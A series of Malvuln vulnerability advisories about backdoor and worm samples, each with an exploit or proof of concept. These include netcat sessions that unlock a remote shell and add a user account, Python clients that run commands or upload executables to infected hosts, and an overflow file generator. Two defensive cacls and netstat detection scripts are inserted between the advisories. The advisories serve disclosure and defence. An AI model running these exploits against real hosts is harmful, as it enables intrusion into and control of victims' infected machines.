[FD] Adversary3 v1.0 / Malware vulnerability intel tool for third-party attackers / updated
Adversary3 has been updated with a bunch of new malware vulnz.

https://github.com/malvuln/Adversary3

Thanks,
Malvuln (aka hyp3rlinx)

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Email-Worm.Win32.Pluto.b / Insecure Permissions
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/60a7d5e2d446110d84ef65f6a37af0eb.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: Email-Worm.Win32.Pluto.b
Vulnerability: Insecure Permissions
Description: The malware writes a dir and PE files with insecure permissions to the C drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.
Family: Pluto
Type: PE32
MD5: 60a7d5e2d446110d84ef65f6a37af0eb
Vuln ID: MVID-2022-0547
Disclosure: 04/14/2022

Exploit/PoC:
C:\>cacls "My Downloads"
C:\My Downloads BUILTIN\Administrators:(OI)(CI)(ID)F
                NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                BUILTIN\Users:(OI)(CI)(ID)R
                NT AUTHORITY\Authenticated Users:(ID)C
                NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

C:\>dir "My Downloads"
 Volume in drive C has no label.

 Directory of C:\My Downloads

02/18/2013  04:39 PM            34,816 Age Of Empires 2 Key Generator.exe
02/18/2013  04:39 PM            34,816 AikaQuest3Hentai Key Generator.exe
02/18/2013  04:39 PM            34,816 AIM Account Stealer ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Battle.net Crack.exe
02/18/2013  04:39 PM            34,816 Black And White ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Civilization 3 Crack.exe
02/18/2013  04:39 PM            34,816 Civilization 3 Full Downloader.exe
02/18/2013  04:39 PM            34,816 Comanche 4 Full Downloader.exe
02/18/2013  04:39 PM            34,816 Comanche 4 ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Combat Flight Simulator 3 Full Downloader.exe
02/18/2013  04:39 PM            34,816 Critical Point Manga game Full Downloader.exe
02/18/2013  04:39 PM            34,816 Critical Point Manga game Patch.exe
02/18/2013  04:39 PM            34,816 Dark Age Of Camelot Shrouded Isles Crack.exe
02/18/2013  04:39 PM            34,816 Dark Age Of Camelot Shrouded Isles Patch.exe
02/18/2013  04:39 PM            34,816 Deadly Dozen Key Generator.exe
02/18/2013  04:39 PM            34,816 Emperor Rise Of the Middle Kingdom Full Downloader.exe
02/18/2013  04:39 PM            34,816 Empire Earth ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 F1 Grand Pix 4 Patch.exe
02/18/2013  04:39 PM            34,816 Free Virus Removal Tool From Symantec Full Downloader.exe
02/18/2013  04:39 PM            34,816 Gladiator Full Downloader.exe
02/18/2013  04:39 PM            34,816 Gladiator ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Grand Prix 4 ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Grand Theft Auto 3 Key Generator.exe
02/18/2013  04:39 PM            34,816 GTA3 ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Half Life Blue Shift ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Hard Truck 18 Wheels of Steel Crack.exe
02/18/2013  04:39 PM            34,816 Industry Giant 2 Crack.exe
02/18/2013  04:39 PM            34,816 International Cricket Captain 2003 Full Downloader.exe
02/18/2013  04:39 PM            34,816 KaZaA Spyware Remover Crack.exe
02/18/2013  04:39 PM            34,816 Macromedia Flash 5.0 Patch.exe
02/18/2013  04:39 PM            34,816 Microsoft Office XP (English) Key Generator.exe
02/18/2013  04:39 PM            34,816 MoviezChannelsInstaler ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 MS Train Simulator Crack.exe
02/18/2013  04:39 PM            34,816 Prisoner Of War ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Prisoner Of War Patch.exe
02/18/2013  04:39 PM            34,816 Quake 4 BETA ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 SIMS Full Downloader.exe
02/18/2013  04:39 PM            34,816 SIMS ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Soldiers Of Anarchy ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Star Wars II Movie Key Generator.exe
02/18/2013  04:39 PM            34,816 Strike Fighter Project 1 Patch.exe
02/18/2013  04:39 PM            34,816 Stronghold Crusader Crack.exe
02/18/2013  04:39 PM            34,816 Sudden Strike 2 Key Generator.exe
02/18/2013  04:39 PM            34,816 The Thing Full Downloader.exe
02/18/2013  04:39 PM            34,816 The Thing Key Generator.exe
02/18/2013  04:39 PM            34,816 Tomb Raider 3 Full Downloader.exe
02/18/2013  04:39 PM            34,816 Warcraft 3 ONLINE Crack.exe
02/18/2013  04:39 PM            34,816 Windows XP Full Downloader.exe
02/18/2013  04:39 PM            34,816 Windows XP ISO - Full Downloader.exe
02/18/2013  04:39 PM            34,816 Zidane-ScreenInstaler Crack.exe
              50 File(s)      1,740,800 bytes
[FD] Backdoor.Win32.Kilo.016 / Denial of Service (UDP Datagram)
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/9ede6951ea527f96a785c5e32b5079e6.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Kilo.016
Vulnerability: Denial of Service (UDP Datagram)
Description: The malware listens on TCP ports 6712, 6713, 6714, 6715, 7722, 15206, 15207, 16712 and UDP . Attackers who can reach an infected host can send a large payload to the UDP port, causing a disruption in service.
Family: Kilo
Type: PE32
MD5: 9ede6951ea527f96a785c5e32b5079e6
Vuln ID: MVID-2022-0546
Disclosure: 04/14/2022

Memory Dump:
(1ab8.1368): Access violation - code c005 (first/second chance not available)
eax=000a1078 ebx=000a1048 ecx=0047b094 edx=000a1078 esi=000a11a0 edi=
eip=776e9fab esp=000a0fc8 ebp=000a100c iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
ntdll!RtlAcquireSRWLockShared+0xb:
776e9fab 56              push    esi
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

FAULTING_IP:
KERNELBASE!RaiseException+62
74a108f2 8b4c2454        mov     ecx,dword ptr [esp+54h]

EXCEPTION_RECORD:  0019f788 -- (.exr 0x19f788)
ExceptionAddress: 74a108f2 (KERNELBASE!RaiseException+0x0062)
   ExceptionCode: 0eedfade
  ExceptionFlags: 0003
NumberParameters: 7
   Parameter[0]: 00413c5f
   Parameter[1]: 06e39bb8
   Parameter[2]:
   Parameter[3]: 004104f0
   Parameter[4]: 042e2d94
   Parameter[5]: 0019fd0c
   Parameter[6]: 0019fcc8

PROCESS_NAME:  Backdoor.Win32.Kilo.016.9ede6951ea527f96a785c5e32b5079e6

ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  0001

EXCEPTION_PARAMETER2:  000a0fc4

WRITE_ADDRESS:  000a0fc4

FOLLOWUP_IP:
KERNELBASE!RaiseException+0
74a10890 8bff            mov     edi,edi

MOD_LIST:

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0019f7d8 -- (.cxr 0x19f7d8)
eax=0019fc38 ebx= ecx=0007 edx= esi=004104f0 edi=042e2d94
eip=74a108f2 esp=0019fc38 ebp=0019fc94 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=0212
KERNELBASE!RaiseException+0x62:
74a108f2 8b4c2454        mov     ecx,dword ptr [esp+54h] ss:002b:0019fc8c=955c75b1
Resetting default scope

ADDITIONAL_DEBUG_TEXT:
Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 0046ea76 to 74a108f2

FAULTING_THREAD:

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_STACK_ACCESS_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_

PRIMARY_PROBLEM_CLASS:  INVALID_STACK_ACCESS_EXPLOITABLE_FILL_PATTERN_

DEFAULT_BUCKET_ID:  INVALID_STACK_ACCESS_EXPLOITABLE_FILL_PATTERN_

STACK_TEXT:
0019fc38 74a108f2 kernelbase!RaiseException+0x62
0019fd14 0046ea76 backdoor_win32_kilo_016+0x6ea76
0019fd6c 0046e995 backdoor_win32_kilo_016+0x6e995
0019fd88 7720e0bb user32!_InternalCallWinProc+0x2b
0019fdb4 77218849 user32!InternalCallWinProc+0x20
0019fdd8 7721b145 user32!UserCallWinProcCheckWow+0x1be
0019fea8 772090dc user32!DispatchMessageWorker+0x4ac
0019ff14 772038c0 user32!DispatchMessageA+0x10
0019ff1c 0044fc8c backdoor_win32_kilo_016+0x4fc8c
0019ff70 004d87b2 backdoor_win32_kilo_016+0xd87b2
0019ff88 77408654 kernel32!BaseThreadInitThunk+0x24
0019ff9c 77704a77 ntdll!__RtlUserThreadStart+0x2f
0019ffe4 77704a47 ntdll!_RtlUserThreadStart+0x1b

SYMBOL_NAME:  kernelbase!RaiseException+0

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: KERNELBASE

IMAGE_NAME:  KERNELBASE.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  .cxr 0019F7D8 ; kb ; dds 19fc38 ; kb

FAILURE_BUCKET_ID:  INVALID_STACK_ACCESS_EXPLOITABLE_FILL_PATTERN__c005_KERNELBASE.dll!RaiseException

BUCKET_ID:  APPLICATION_FAULT_INVALID_STACK_ACCESS_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN__kernelbase!RaiseException+0

Exploit/PoC:
python -c "print('A'*3)" | nc64.exe x.x.x.x -c -u
[FD] Backdoor.Win32.NinjaSpy.c / Authentication Bypass
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/9f39606d9e19771af5acc6811ccf557f.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.NinjaSpy.c
Vulnerability: Authentication Bypass
Description: The malware listens on TCP ports 2003, 2004 and drops a PE file named "cmd.dll" under the Windows dir. Connecting to port 2003, you will get back a number "9951" from the infected host. If we send the value 1000 we get a message in Portuguese, "Pisca Pisca Ativado", which translates to "Blink Blink Activated". If we connect to port 2004 and send "abc123" we get the message "Acesso negado...", which translates to "Access denied". However, if you take the initial number we received earlier (9951) when connecting to port 2003 and apply some calculation, we expose hidden functionality. Take the 9951 value and invert the first two digits to 66 and then add together the last two, 5 + 1, to equal 6, for a final value of "666". Example: initial number (9951), 99 inverted equals 66 and 5 + 1 = 6. Enter and send the constructed value of "666" to port 2003 and TCP port 999 is opened. Connect to port 999 and you get back a remote shell.
Family: NinjaSpy
Type: PE32
MD5: 9f39606d9e19771af5acc6811ccf557f
Vuln ID: MVID-2022-0552
Disclosure: 04/14/2022

Exploit/PoC:
C:\>nc64.exe x.x.x.x 2004
test
Acesso negado...pwd

C:\>nc64.exe x.x.x.x 2003
9952
666

C:\>nc64.exe x.x.x.x 999
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami
whoami
desktop-2c3iqho\victim

C:\dump>net user hyp3rlinx abc123 /add
net user hyp3rlinx abc123 /add
The command completed successfully.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
[FD] Backdoor.Win32.NetSpy.10 / Unauthenticated Remote Command Execution
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/45d413b46f1d14a45e8fd36921813d62.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.NetSpy.10
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 7306. Attackers who can reach infected hosts can run commands made available by the backdoor. Sending commands using Ncat and Telnet both fail with errors; it probably doesn't like the linefeed chars, so you need to write your own custom client. Example commands available are put, mkd, exec and msg.
Family: NetSpy
Type: PE32
MD5: 45d413b46f1d14a45e8fd36921813d62
Vuln ID: MVID-2022-0551
Disclosure: 04/14/2022

Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=7306
CMD="exec c:\\Windows\\system32\\calc.exe"

def chk_res(s):
    res=""
    while True:
        res += s.recv(512)
        if "\0" in res or "\n" in res or res == "":
            break
        break
    return res

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))
    s.send(CMD)
    time.sleep(1)
    print(chk_res(s))
    s.close()
[FD] Backdoor.Win32.NetCat32.10 / Unauthenticated Remote Command Execution
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/dcf16aed5ad4e0058a6cfcc7593dd9e3.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.NetCat32.10
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port . Attackers who can reach infected systems can run commands made available by the backdoor using TELNET.
Family: NetCat32
Type: PE32
MD5: dcf16aed5ad4e0058a6cfcc7593dd9e3
Vuln ID: MVID-2022-0550
Disclosure: 04/14/2022

Exploit/PoC:
telnet.exe x.x.x.x
HELO
HHEELLPP
HELP      This help
EXIT      Quit your session
VER       Get Versions
ExitWin   Shutdown Windows
CLIP      View Clipboard
PASS      Display Cached Pass
DOWNLOAD  Host download file
GET       Get file from host
EXEC      ShellExecute
EXECHIDE  ShellExecute
SHOW      Show Window
HIDE      Hide Window
MAXALL    Max all Windows
MINALL    Min all Windows
RESTALL   Restore Windows
LISTWIN   List Windows
DESK      Set Desktop Color
WALL      Set Wallpaper
MKDIR     Make Directory
RMDIR     Remove Directory
RM        Delete File
MOVE      Move / Rename File
LS        List Directory
TELNET    Connect another
FUNCAP    Rock the CapLock
CDROM     Open/Close cdrom
+OK
EEXXEECC ccaallcc
+OK
[FD] HackTool.Win32.IpcScan.c / Local Stack Buffer Overflow
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/8f44374d587eb1657d25da9628cb2b87.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: HackTool.Win32.IpcScan.c
Vulnerability: Local Stack Buffer Overflow
Description: Loading a specially crafted PE file will cause a stack buffer overflow overwriting the ECX and EIP registers.
Family: IpcScan
Type: PE32
MD5: 8f44374d587eb1657d25da9628cb2b87
Vuln ID: MVID-2022-0549
Disclosure: 04/14/2022

Memory Dump:
(d60.c9c): Access violation - code c005 (first/second chance not available)
eax= ebx= ecx=41414141 edx=77729d70 esi= edi=
eip=41414141 esp=000a13f0 ebp=000a1410 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
41414141 ??              ???
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for HackTool.Win32.IpcScan.c.8f44374d587eb1657d25da9628cb2b87.exe
*** ERROR: Module load completed but symbols could not be loaded for HackTool.Win32.IpcScan.c.8f44374d587eb1657d25da9628cb2b87.exe
Matched: 744f0021 msvcrt!ReadString (void)
Matched: 744f4491 msvcrt!ReadString (void)
Matched: 744faf90 msvcrt!ReadString (void)
Matched: 744fbf79 msvcrt!ReadString (void)
Matched: 744ffe60 msvcrt!ReadString (void)
Matched: 745010d1 msvcrt!ReadString (void)
Matched: 7450e2b4 msvcrt!ReadString (void)
Matched: 7450f52e msvcrt!ReadString (void)
Matched: 745119d4 msvcrt!ReadString (void)
Matched: 74512d75 msvcrt!ReadString (void)

FAULTING_IP:
msvcrt!ReadString+12f
7450e3e3 8801            mov     byte ptr [ecx],al

EXCEPTION_RECORD:  0019ec24 -- (.exr 0x19ec24)
ExceptionAddress: 7450e3e3 (msvcrt!ReadString+0x012f)
   ExceptionCode: c005 (Access violation)
  ExceptionFlags:
NumberParameters: 2
   Parameter[0]: 0001
   Parameter[1]: 001a
Attempt to write to address 001a

PROCESS_NAME:  HackTool.Win32.IpcScan.c.8f44374d587eb1657d25da9628cb2b87.exe

ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  0008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141

FOLLOWUP_IP:
+12f
41414141 ??              ???

FAILED_INSTRUCTION_ADDRESS:
+12f
41414141 ??              ???

MOD_LIST:

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141
The fault address in not in any loaded module, please check your build's rebase
log at \bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  0019ec74 -- (.cxr 0x19ec74)
eax=0041 ebx=0020 ecx=001a edx=0019f18c esi=0019f15c edi=0019f180
eip=7450e3e3 esp=0019f0d4 ebp=0019f0f8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
msvcrt!ReadString+0x12f:
7450e3e3 8801            mov     byte ptr [ecx],al          ds:002b:001a=41
Resetting default scope

ADDITIONAL_DEBUG_TEXT:
Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 7450f0b8 to 7450e3e3

FAULTING_THREAD:

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

STACK_TEXT:
0019f0d4 7450e3e3 msvcrt!ReadString+0x12f
0019f100 7450f0b8 msvcrt!_input_l+0xab8
0019f310 745030e0 msvcrt!vfscanf+0xe0
0019f358 74502fcb msvcrt!fscanf+0x1b
0019f374 00402b98 hacktool_win32_ipcscan_c+0x2b98
0019f380 0019f394 unknown!unknown+0x0

STACK_COMMAND:  .cxr 0019EC74 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 19f0d4 ; kb

SYMBOL_NAME:  msvcrt!ReadString

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: msvcrt

IMAGE_NAME:  msvcrt.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  692918b7

FAILURE_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c005_msvcrt.dll!ReadString

BUCKET_ID:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_msvcrt!ReadString

Exploit/PoC:
python -c "print('MZ'+'A'*1)" > DOOM.exe
[FD] Backdoor.Win32.Psychward.03.a / Weak Hardcoded Password
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/d069738f18957117367b8a79195a6a96.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Psychward.03.a
Vulnerability: Weak Hardcoded Password
Description: The malware listens on TCP port 69. The password "tyme" is weak and stored in plaintext with the executable.
Family: Psychward
Type: PE32
MD5: d069738f18957117367b8a79195a6a96
Vuln ID: MVID-2022-0548
Dropped files: winvxd.exe
Disclosure: 04/14/2022

Exploit/PoC:
C:\>nc64.exe x.x.x.x 69
pwd
tyme
tyme
psychward revised 0.3, awaiting your command
[FD] Backdoor.Win32.Prorat.cwx / Insecure Permissions
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/2d81bf2c55c81778533b55fb444d4dc6.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Prorat.cwx
Vulnerability: Insecure Permissions
Description: The malware writes a ".EXE" file with insecure permissions to the C drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.
Family: Prorat
Type: PE32
MD5: 2d81bf2c55c81778533b55fb444d4dc6
Vuln ID: MVID-2022-0545
Disclosure: 04/14/2022

Exploit/PoC:
C:\>cacls a.exe
C:\a.exe BUILTIN\Administrators:(ID)F
         NT AUTHORITY\SYSTEM:(ID)F
         BUILTIN\Users:(ID)R
         NT AUTHORITY\Authenticated Users:(ID)C

C:\dump>dir /a \a.exe
 Volume in drive C has no label.

 Directory of C:\

04/08/2022  02:31 AM           368,609 a.exe
               1 File(s)        368,609 bytes
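The Pluto.b and Prorat advisories above both rest on the same defect: a dropped directory or executable whose ACL gives Authenticated Users change (C) rights. The following is an added audit example, not Malvuln's code, that parses cacls-style output such as the two listings quoted in those advisories and flags every ACE granting a broad group (Authenticated Users, Users, Everyone) a write-equivalent right. The sample ACL text is constructed from the advisory output; the function names and the set of trustee prefixes the regex recognises are this example's own assumptions and should be extended with domain or local account names on real hosts.

```python
import re

# One ACE line as cacls prints it: an optional leading object path (present
# only on the first line for each object), the trustee, optional inheritance
# flags in parentheses, and one right letter (F full, C change, W write,
# R read, N none). Assumption: the trustee alternation covers only the
# well-known accounts that appear in the advisories; add domain or local
# account prefixes for your own hosts.
ACE_RE = re.compile(
    r"^(?:(?P<path>.+?)\s+)?"
    r"(?P<trustee>(?:NT AUTHORITY|BUILTIN|CREATOR OWNER|Everyone)(?:\\[^:]+)?):"
    r"(?P<flags>(?:\([A-Z]+\))*)"
    r"(?P<right>[FCRWN])$"
)

# Groups that amount to "any user who can log on".
BROAD_TRUSTEES = {"NT AUTHORITY\\Authenticated Users", "BUILTIN\\Users", "Everyone"}
# Rights that let such a user rename or replace the object.
WRITE_EQUIVALENT = {"F", "C", "W"}

# Constructed from the cacls output quoted in the Pluto.b and Prorat advisories.
PLUTO_SAMPLE = r"""C:\My Downloads BUILTIN\Administrators:(OI)(CI)(ID)F
                NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                BUILTIN\Users:(OI)(CI)(ID)R
                NT AUTHORITY\Authenticated Users:(ID)C
                NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
"""
PRORAT_SAMPLE = r"""C:\a.exe BUILTIN\Administrators:(ID)F
         NT AUTHORITY\SYSTEM:(ID)F
         BUILTIN\Users:(ID)R
         NT AUTHORITY\Authenticated Users:(ID)C
"""


def parse_cacls(text):
    """Parse cacls output into (path, trustee, flags, right) tuples.

    The path is carried forward from the first line of each object to its
    indented continuation lines.
    """
    entries, path = [], None
    for raw in text.splitlines():
        m = ACE_RE.match(raw.strip())
        if m is None:
            continue
        if m.group("path"):
            path = m.group("path")
        entries.append((path, m.group("trustee"), m.group("flags"), m.group("right")))
    return entries


def weak_aces(text):
    """Return the ACEs that grant a broad group write-equivalent access."""
    return [e for e in parse_cacls(text)
            if e[1] in BROAD_TRUSTEES and e[3] in WRITE_EQUIVALENT]


if __name__ == "__main__":
    for name, sample in (("Pluto.b", PLUTO_SAMPLE), ("Prorat", PRORAT_SAMPLE)):
        for path, trustee, flags, right in weak_aces(sample):
            print(f"{name}: {path} grants {trustee} {flags}{right}")
```

Run against the Pluto.b listing it reports the two Authenticated Users entries and nothing else; BUILTIN\Users with R is left alone because read access on the dropped binary does not let a standard user swap it out. On a live host, feed it the output of cacls for the directories the malware is known to write to, and treat any finding on a file that a privileged account will later execute as the privilege-escalation condition the advisories describe.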
[FD] Backdoor.Win32.MotivFTP.12 / Authentication Bypass
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/91b2d216c5d26d9db4289acf68fa1743.txt
Contact: malvul...@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.MotivFTP.12
Vulnerability: Authentication Bypass
Description: The malware listens on TCP port 21. Third-party attackers who can reach infected systems can log on using any username/password combination. Intruders may then upload executables using the FTP PASV and STOR commands, which can result in remote code execution.
Family: MotivFTP
Type: PE32
MD5: 91b2d216c5d26d9db4289acf68fa1743
Vuln ID: MVID-2022-0544
Disclosure: 04/14/2022

Exploit/PoC:
C:\>nc64.exe 192.168.18.125 21
220 FTP Server ready
USER malvuln
331 Password required for malvuln.
PASS malvuln
230 User malvuln logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
PASV
CDUP \
250 CWD command successful. "C:/" is current directory.
PASV
227 Entering Passive Mode (192,168,18,125,194,25).
STOR DOOM.exe
150 Opening data connection for DOOM.exe.
226 File received ok

from socket import *
import time

HOST = "192.168.18.125"
PORT = 49689
BUF_SIZE = 32

s=socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))

with open("DOOM.exe", "rb") as f:
    while True:
        bytez = f.read(BUF_SIZE)
        if not bytez:
            break
        s.send(bytez)
        time.sleep(0.5)

print("By malvuln")
s.close()
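Every backdoor advisory in this batch (Kilo, NinjaSpy, NetSpy, Psychward, MotivFTP) names the TCP ports the sample listens on, which is the cheapest host-side signal a defender has. The following is an added detection example, not Malvuln's code, that parses Windows `netstat -ano` style output and matches each process's listening ports against those advisory port sets, grouping by PID so that a process binding several ports of one family (NinjaSpy's 2003 and 2004) ranks above a single shared service port. The netstat lines, PIDs and the reuse of the advisory's 192.168.18.125 address are constructed sample data; NetCat32 is omitted because its advisory does not give the port.

```python
import re
from collections import defaultdict

# Listening ports named in the Malvuln advisories above (Kilo, NinjaSpy,
# NetSpy, Psychward, MotivFTP); NetCat32 is omitted because its port is
# not given in the advisory text.
BACKDOOR_PORTS = {
    "Backdoor.Win32.Kilo.016": {6712, 6713, 6714, 6715, 7722, 15206, 15207, 16712},
    "Backdoor.Win32.NinjaSpy.c": {2003, 2004, 999},
    "Backdoor.Win32.NetSpy.10": {7306},
    "Backdoor.Win32.Psychward.03.a": {69},
    "Backdoor.Win32.MotivFTP.12": {21},
}

# Ports that legitimate services also bind; a hit on one of these alone is
# weak evidence and needs the owning process checked.
COMMON_SERVICE_PORTS = {21, 69}

# Row of "netstat -ano" on Windows: proto, local, remote, optional state, PID.
NETSTAT_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)

# Constructed sample; the PIDs and the reuse of the MotivFTP advisory's
# 192.168.18.125 address are illustrative only.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:7306           0.0.0.0:0              LISTENING       4120
  TCP    0.0.0.0:2003           0.0.0.0:0              LISTENING       3388
  TCP    0.0.0.0:2004           0.0.0.0:0              LISTENING       3388
  TCP    192.168.18.125:21      0.0.0.0:0              LISTENING       2760
  TCP    0.0.0.0:69             0.0.0.0:0              LISTENING       5012
  TCP    192.168.18.125:49689   192.168.18.1:50112     ESTABLISHED     2760
  UDP    0.0.0.0:5353           *:*                                    1588
"""


def parse_netstat(text):
    """Return (proto, host, port, state, pid) tuples for each socket row."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m is None:
            continue  # header and blank lines
        host, _, port = m.group("local").rpartition(":")
        rows.append((m.group("proto"), host, int(port),
                     m.group("state") or "", int(m.group("pid"))))
    return rows


def listening_ports_by_pid(rows):
    """Group TCP LISTENING ports by owning process."""
    by_pid = defaultdict(set)
    for proto, _host, port, state, pid in rows:
        if proto == "TCP" and state == "LISTENING":
            by_pid[pid].add(port)
    return by_pid


def suspicious_listeners(text):
    """Match each process's listening ports against the advisory port sets.

    A process that binds several ports of one family (NinjaSpy's 2003 and
    2004) is a stronger signal than a single shared service port.
    """
    findings = []
    for pid, ports in sorted(listening_ports_by_pid(parse_netstat(text)).items()):
        for family, known in BACKDOOR_PORTS.items():
            hits = sorted(ports & known)
            if not hits:
                continue
            only_common = all(p in COMMON_SERVICE_PORTS for p in hits)
            findings.append({"pid": pid, "family": family, "ports": hits,
                             "confidence": "low" if only_common else "high"})
    return findings


if __name__ == "__main__":
    for f in suspicious_listeners(SAMPLE_NETSTAT):
        print(f"PID {f['pid']}: ports {f['ports']} match {f['family']} ({f['confidence']} confidence)")
```

Port 21 and port 69 are marked low confidence on purpose: a real FTP server or a TFTP daemon bound to TCP 69 will trip the same rule, so those hits should be resolved by looking at the image path and hash of the PID (the advisories give the MD5 of each sample) before anything is acted on.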
